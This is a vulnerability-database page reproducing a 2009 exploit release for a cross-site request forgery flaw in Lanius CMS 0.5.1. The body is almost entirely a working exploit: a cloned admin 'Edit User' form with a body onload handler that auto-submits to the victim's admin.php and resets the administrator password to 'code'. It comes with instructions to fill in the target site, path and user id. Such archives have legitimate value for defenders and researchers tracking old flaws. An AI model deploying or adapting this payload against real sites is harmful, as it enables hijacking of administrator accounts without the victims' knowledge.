Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormD14lPACKETSTORM:74820
HistoryFeb 10, 2009 - 12:00 a.m.

Lanius CMS 0.5.1 XSRF

2009-02-1000:00:00
d14l
packetstormsecurity.com
35
JSON
`[-]Lanius CMS 0.5.1 CSRF vulnerability  
  
[-]exploit found by d14l and marcoj  
  
  
  
[-]greetz to soul,stefo,sp1r1t,invisible,kisobran and others  
  
  
[-] lanius CMS suffers from csrf vulnerabilities which allows attacker change admins password  
  
  
  
it is only important to change in source [site],[path] and [id] of victim and it will change victims password to "code"  
  
  
  
  
  
  
//////////////////////////////////////////////////CODE///////////////////////////////////////////////////////////////////////////  
  
  
  
  
<script type="text/javascript" language="javascript" src="http://[site]/[path]/admin/includes/js/anthill.js"></script>  
<script type="text/javascript" language="javascript">  
/* <![CDATA[ */  
var lcms_data_form='adminform';  
/* ]]> */  
</script>  
<script type="text/javascript" language="javascript" src="includes/js/progressbar.js"></script>  
<script type="text/javascript" language="javascript" src="includes/js/passwordquality.js"></script>  
<link href="includes/css/progressbar.css" rel="stylesheet" type="text/css" media="all" />  
  
<script type="text/javascript" language="javascript">  
/* <![CDATA[ */  
function _init_pwd_box() {  
initQualityMeter("user_password", "the_password", "Password quality: ");  
}  
pb_addEvent(window, "load", _init_pwd_box);  
  
/* ]]> */  
</script>  
<script type="text/javascript" language="javascript">  
/* <![CDATA[ */  
  
var dil_folder = 'media/forum/avatars/';  
var dil_default_src = 'media/forum/avatars/default.png';  
  
function changeImage(srcObj,srcListName) {  
var im=document.getElementById("image_"+srcListName);  
var obj_v = srcObj.value;  
if (obj_v==null || obj_v=="") im.src = dil_default_src;   
else im.src = dil_folder+obj_v;  
}  
  
  
/* ]]> */  
</script>  
<script type="text/javascript" language="javascript" src="components/forum/forum.js"></script>  
<script type="text/javascript" language="javascript">  
/* <![CDATA[ */  
function ui_lcms_st(pressbutton){  
var frm=document.getElementById(lcms_data_form);  
if ( pressbutton == 'save' ) {  
  
var frm=document.getElementById('adminform');  
field_value=frm.user_name.value;  
if (!field_value.length) { alert("Invalid value for\n\nDisplay name");return false;  
}  
field_value=frm.user_user.value;  
if (!field_value.length) { alert("Invalid value for\n\nUsername");return false;  
}  
field_value=frm.user_email.value;  
if (!field_value.length) { alert("Invalid value for\n\nEmail");return false;  
}  
  
} if ( pressbutton == 'cancel' ) {  
document.location.href=frm.action; return;}  
  
lcms_st(pressbutton);  
}  
  
/* ]]> */  
</script>  
<script language="javascript" type="text/javascript">  
var cmThemeDefaultBase = "admin/templates/default/images/";  
</script>  
<script language="javascript" src="admin/templates/default/js/JSCookMenu.js" type="text/javascript"></script>  
<script language="javascript" src="index2.php?option=service&service=admin_menu&no_html=1&lang=en" type="text/javascript"></script>  
<script language="javascript" src="admin/templates/default/js/ThemeDefault/theme.js" type="text/javascript"></script>  
<link rel="stylesheet" href="admin/templates/default/js/ThemeDefault/theme.css" type="text/css" /><script language="javascript" src="admin/includes/js/dhtml.js" type="text/javascript"></script>  
  
<link rel="stylesheet" href="admin/templates/default/css/template.style.css" type="text/css" />  
</head>  
<body>  
<body onload="ui_lcms_st('save');">  
  
<table width="100%" border="0" cellspacing="0" cellpadding="0">  
<tr>  
<td width="320" class="top-logo" >  
<img src="admin/templates/default/images/header.png" alt="Administration" />  
</td>  
<td width="240" class="top-update" >  
<a class="dlinks" title="Information about the latest version available, click to start the automatic update wizard" href="http://[site]/[path]/admin.php?com_option=system&option=autoupdate"><img border="0" src="http://www.laniuscms.org/services/status.png.php?v=0.5.1+r843" alt="Information about the latest version available, click to start the automatic update wizard" /></a>   
</td>  
<td align="right" class="top-logo" ><a href="index.php?option=login&task=logout" class="wlink" style="color: #e5e5e5"><img src="admin/templates/default/images/logout.png" border="0" alt="" />&nbsp;Logout</a>&nbsp;</td>  
  
</tr>  
</table>  
<table width="100%" border="0" cellspacing="0" cellpadding="0">  
<tr class="toolmenu">  
<td height="25"><div id="myMenuID" style="margin-left: 15px;"></div>  
<script language="javascript" type="text/javascript">  
cmDraw ("myMenuID", myMenu, "hbr", cmThemeDefault, "ThemeDefault");  
</script>  
<noscript><big>Your browser does not have javascript support, please enable it or either ask the administrator to enable a non-javascript menu</big></noscript></td>  
<td align="right">  
<table class="hotlinks" border="0" cellspacing="0" cellpadding="2">  
<tr><td>&nbsp;</td>  
  
</tr>  
</table>  
</td>  
<td align="right"></td>  
</tr>  
</table>  
<table width="100%" cellspacing="0" cellpadding="0">  
<tr><td class="pathway-backend"><a title="Home page" href="http://[site]/[path]/admin.php" class="pathway"><img src="media/common/home.png" border="0" alt="Home page" /></a> Edit User <a title="Permanent link to this page" href="http://[site]/[path]/admin.php?com_option=user&task=edit&cid[]=[id]"><img src="media/common/box.png" border="0" alt="Permanent link to this page" /></a> </td>  
</tr>  
  
</table>  
<div class="dka_component">  
<form id='adminform' name='adminform' method='post' action='http://[site]/[path]/admin.php?com_option=user' enctype='multipart/form-data'><div class="toolbar-header"><input name="btn_save" type="button" value="Save" onclick="ui_lcms_st('save');" />  
<input name="btn_cancel" type="button" value="Cancel" onclick="history.go(-1)" />  
<noscript>  
<p> If you have no javascript support, then ignore the above buttons and use this combo box.</p>  
<select name="alt_task[]">  
<option value="">--</option>  
<option value="save">Save</option>  
<option value="cancel">Cancel</option>  
</select>  
<input type="submit" value="Go" /></noscript>  
</div><table border='0' cellpadding='0' cellspacing='0' width='100%' align='center'>  
<tr><td colspan='2' class="" ><input type="hidden" name="task" value="" /></td></tr>  
  
<tr><td colspan='2' class="header1" >Edit User</td></tr>  
  
<tr><td colspan="2">  
<table width="100%" border="0" cellpadding="5" cellspacing="2" >  
<tr><td class="tabtitle">Edit User&nbsp;</td></tr><tr>  
  
<td class="tabbody">  
<table width="90%" border="0" align="center" cellpadding="2" cellspacing="0">  
<tr><td width="200">&nbsp;</td><td>&nbsp;</td></tr>  
<tr><td colspan='2' class="" ><input type="hidden" name="user_id" value="244" /></td></tr>  
  
<tr><td class="" valign="top" nowrap="nowrap"><span style="color:red">*</span> Display name</td><td class="" ><input type="text" name="user_name" value="Webaaaaamaster" class="tf" size="40" /></td></tr>  
  
<tr><td class="" valign="top" nowrap="nowrap"><span style="color:red">*</span> Username</td><td class="" ><input type="text" name="user_user" value="admin" class="tf" size="40" /></td></tr>  
  
<tr><td class="" valign="top" nowrap="nowrap"><span style="color:red">*</span> Email</td><td class="" ><input type="text" name="user_email" value="[email protected]" class="tf" size="40" /></td></tr>  
  
<tr><td class="" valign="top" nowrap="nowrap"> Language</td><td class="" ><select name="user_lang" class="tf">  
<option value="" selected="selected" style="color: grey">-- Auto --</option>  
<option value="en">English</option>  
</select>  
</td></tr>  
  
<tr><td class="" valign="top" nowrap="nowrap"> User timezone</td><td class="" ><select name="user_tz" class="tf">  
  
<option value="">-- Auto --</option>  
<option value="Africa/Abidjan">Africa/Abidjan</option>  
  
</select>  
</td></tr>  
  
<tr><td class="" valign="top" nowrap="nowrap"> Users Group</td><td class="" ><select name="user_gid" class="tf">  
<option value="1">Registered</option>  
<option value="2">Editor</option>  
<option value="3">Publisher</option>  
<option value="4">Manager</option>  
<option value="5" selected="selected" style="color: grey">Administrator</option>  
  
</select>  
</td></tr>  
  
<tr><td colspan='2' class="" >&nbsp;</td></tr>  
  
<tr><td colspan='2' class="" > Leave the password field empty to preserve the previous password</td></tr>  
  
<tr><td class="" valign="top" nowrap="nowrap"> Password</td><td class="" ><input type="password" name='user_password' value='code' class="tf" size='40' onkeypress="updateQualityMeter(this)" /></td></tr>  
  
<tr><td class="" valign="top" nowrap="nowrap"> </td><td class="" ><div id="the_password"></div></td></tr>  
  
<tr><td class="" valign="top" nowrap="nowrap"> Password confirmation</td><td class="" ><input type="password" name='user_password1' value='code' class="tf" size='40' /></td></tr>  
  
<tr><td colspan='2' class="" >&nbsp;</td></tr>  
  
<tr><td class="" valign="top" nowrap="nowrap"> </td><td class="" ><label for="user_message_allow">  
<input id="user_message_allow" name="user_message_allow" type="checkbox" />Allow other users to send messages to me (email will not be visible to them)</label><br /><label for="user_message_show_email">  
<input id="user_message_html" name="user_message_html" type="checkbox" />Can receive HTML emails</label><br /><label for="user_message_attach">  
<input id="user_message_attach" name="user_message_attach" type="checkbox" checked="checked"/>Receive also attachments</label><br />  
<div class="dk_content"><h3>Avatar</h3><table border="0" cellspacing="0" cellpadding="0"><tr>  
<td><select name='user_avatar' class="tf" size='6' onchange='javascript:changeImage(this,"user_avatar")' >  
<option value="default.png" selected='selected' >< Current ></option>  
  
<option value="abstract8.png" >abstract8.png</option>  
  
  
</select></td>  
<td><img src="media/forum/avatars/default.png" id="image_user_avatar" name="image_user_avatar" border="2" alt="" /></td>  
</tr></table>  
<script type="text/javascript" language="javascript">  
/* <![CDATA[ */  
var tmpi_0 = new Image();  
tmpi_0.src="media/forum/avatars/default.png";  
  
/* ]]> */  
</script>  
</div>  
<div class="dk_content"><input type="hidden" name="MAX_FILE_SIZE" value="614400" />  
<input id="user_uploaded_avatar" name="user_uploaded_avatar" type="file" class="dk_inputbox" value="" size="45" /></div>  
<div class="dk_content">  
<h3>Forum user statistics</h3>Posts: 1<br />Member since 09 February 2009 19:10</div>  
  
<p><h3>Forum user information</h3></p>  
<div class="dk_content">Location: <input class="dk_inputbox" type="text" name="user_location" size="40" maxlength="100" value="" /></div>  
<div class="dk_content">Website: <input class="dk_inputbox" type="text" name="user_url" size="40" value="" /></div>  
<table border="0">  
<tr>  
<td valign="top">&nbsp;</td>  
<td><a href='javascript:DoPrompt("user_information", "url");'><img src="components/forum/images/bburl.png" alt="Web Address" border="0" hspace="1"/></a> <a href='javascript:DoPrompt("user_information", "email");'><img src="components/forum/images/bbemail.png" alt="Email Address" hspace="1" border="0"/></a> <a href='javascript:DoPrompt("user_information", "bold");'><img src="components/forum/images/bbbold.png" alt="Bold Text" border="0" hspace="1" /></a> <a href='javascript:DoPrompt("user_information", "italic");'><img src="components/forum/images/bbitalic.png" alt="Italic Text" border="0" hspace="1"/></a> <a href='javascript:DoPrompt("user_information", "underline");'><img src="components/forum/images/bbunderline.png" alt="Underlined Text" border="0" hspace="1"/></a> <a href='javascript:DoPrompt("user_information", "quote");'><img src="components/forum/images/bbquote.png" alt="Quote" border="0" hspace="1"/></a> <a href='javascript:DoPrompt("user_information", "code");'><img src="components/forum/images/bbcode.png" alt="Code" border="0" hspace="1"/></a>  
  
</td>  
</tr>  
<tr>  
<td valign="top">User provided information (max 1024 characters)</td>  
<td><textarea name="user_information" cols="30" rows="16" class="dk_inputbox" id="user_information"></textarea></td>  
</tr> <tr>  
<td valign="top">&nbsp;</td>  
  
<td><a href='javascript:DoPrompt("user_signature", "url");'><img src="components/forum/images/bburl.png" alt="Web Address" border="0" hspace="1"/></a> <a href='javascript:DoPrompt("user_signature", "email");'><img src="components/forum/images/bbemail.png" alt="Email Address" hspace="1" border="0"/></a> <a href='javascript:DoPrompt("user_signature", "bold");'><img src="components/forum/images/bbbold.png" alt="Bold Text" border="0" hspace="1" /></a> <a href='javascript:DoPrompt("user_signature", "italic");'><img src="components/forum/images/bbitalic.png" alt="Italic Text" border="0" hspace="1"/></a> <a href='javascript:DoPrompt("user_signature", "underline");'><img src="components/forum/images/bbunderline.png" alt="Underlined Text" border="0" hspace="1"/></a> <a href='javascript:DoPrompt("user_signature", "quote");'><img src="components/forum/images/bbquote.png" alt="Quote" border="0" hspace="1"/></a> <a href='javascript:DoPrompt("user_signature", "code");'><img src="components/forum/images/bbcode.png" alt="Code" border="0" hspace="1"/></a>  
</td>  
</tr>  
<tr>  
<td valign="top">Custom signature (max 300 characters)</td>  
  
<td><textarea name="user_signature" cols="30" rows="3" class="dk_inputbox" id="user_signature"></textarea></td>  
</tr> </table></td></tr>  
  
</table></td></tr></table>  
</td></tr>  
</table><br /><div class="toolbar-footer" style="text-align: left"><input name="btn_save" type="button" value="Save" onclick="ui_lcms_st('save');" />  
<input name="btn_cancel" type="button" value="Cancel" onclick="history.go(-1)" />  
<noscript>  
<p> If you have no javascript support, then ignore the above buttons and use this combo box.</p>  
<select name="alt_task[]">  
<option value="">--</option>  
<option value="save">Save</option>  
<option value="cancel">Cancel</option>  
</select>  
<input type="submit" value="Go" /></noscript>  
</div></form></div>  
<div class="footer">  
<div title="Donate now EUR 10 for the Lanius CMS Project" align="center">  
  
<form id="_xclick" name="_xclick" action="https://www.paypal.com/cgi-bin/webscr" method="post" target="_blank">  
<input name="cmd" value="_xclick" type="hidden" />  
<input name="business" value="[email protected]" type="hidden" />  
<input name="no_shipping" value="0" type="hidden" />  
<input name="lc" value="EN" type="hidden" />  
<input name="item_name" value="Lanius CMS Project donation from website" type="hidden" />  
<input name="currency_code" value="EUR" type="hidden" />  
<input name="amount" value="10.00" type="hidden" />  
Support the Lanius CMS Project with a small donation:  
<input src="media/common/donate.png" name="submit" alt="Lanius CMS Project donation from website" type="image" />  
</form>  
</div>  
</div>  
</body>  
</html>  
  
////////////////////////////////////////////end of code////////////////////////////////////////////////`
JSON